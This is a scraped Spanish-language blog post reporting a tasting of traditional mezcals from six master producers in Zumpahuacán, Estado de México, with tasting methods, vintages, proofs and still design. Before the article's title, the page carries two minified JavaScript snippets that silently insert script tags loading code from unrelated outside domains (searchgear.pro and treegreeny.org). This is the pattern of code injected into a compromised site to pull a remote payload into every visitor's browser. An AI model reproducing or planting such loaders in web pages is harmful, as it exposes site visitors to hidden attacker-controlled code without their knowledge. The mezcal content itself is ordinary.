;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Mezcales Tradicionales de los Pueblos de México » 84. Maestros mezcalilleros del EdoMex

84. Maestros mezcalilleros del EdoMex


El pasado fin de semana fui a una saboreada de Mezcales Tradicionales (MT) de la región de Zumpahuacán, EdoMex, a la que convocaron y acudieron: 6 maestros mezcalilleros; miembros de la agrupación Mezcales Tradicionales de los Pueblos de México; Turismo Responsable e Identidad Plural (TRIP) y la Logia de los Mezcólatras. El evento contó con el apoyo de los ayuntamientos de Zumpahuacán y de Ocuilan de Arteaga.
Fueron los propios maestros mezcalilleros quienes presentaron sus mezcales y explicaron, detalladamente, el arduo y complejo proceso de elaboración; por supuesto que cada quién presentó el suyo. Hecha la presentación, se venenciaron los destilados para analizar su perleado, en el que se observó el tamaño de las perlas, su duración, y la manera en que éstas desaparecen. En seguida, se frotaron entre las manos algunas gotas de mezcal para aspirar su residuo aromático; para sentir su aceitosidad natural, se colocaron otras gotas entre el pulgar y el índice para mensurarla. La percepción en nariz y en boca fue precedida por sencillas sugerencias que ayudaron a detectar, con mayor nitidez e intensidad, los aromas y sabores de cada uno.
Terminado el saboreo de cada mezcal, se realizó una ronda de opiniones sobre lo percibido. Esto permitió tener una idea más clara del gusto histórico -cómo se hacen, a qué huelen y saben los MT- de Zumpahuacán. Para contar con una metodología y conocimiento más certero, hacen falta muchísimas sesiones como ésta.
Los MT saboreados fueron de: José Luis Medina (mayo 2011, 47º); Artemio Chávez (mayo 2010, 46.2º); Jeremías Vázquez (mayo 2010, 47º); Andrés Castañeda (abril 2009, 48º); Pedro Romero (abril 2011, 48º) y Fructuoso García (abril 2011, 47.3º). Todos de magueyes criollos silvestres que maduran entre los 5 y 10 años, y destilados en alambique cuyo capitel es un tronco de zompantle o colorín ahuecado al que en la región llaman cascomite.
Quien desee saborear dos MT de Zumpahuacán, acuda el martes 19 -20 horas- a Red Fly: Orizaba 145, Roma DF.

http://impreso.milenio.com/node/8992959

Category: Milenio, Publicaciones

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *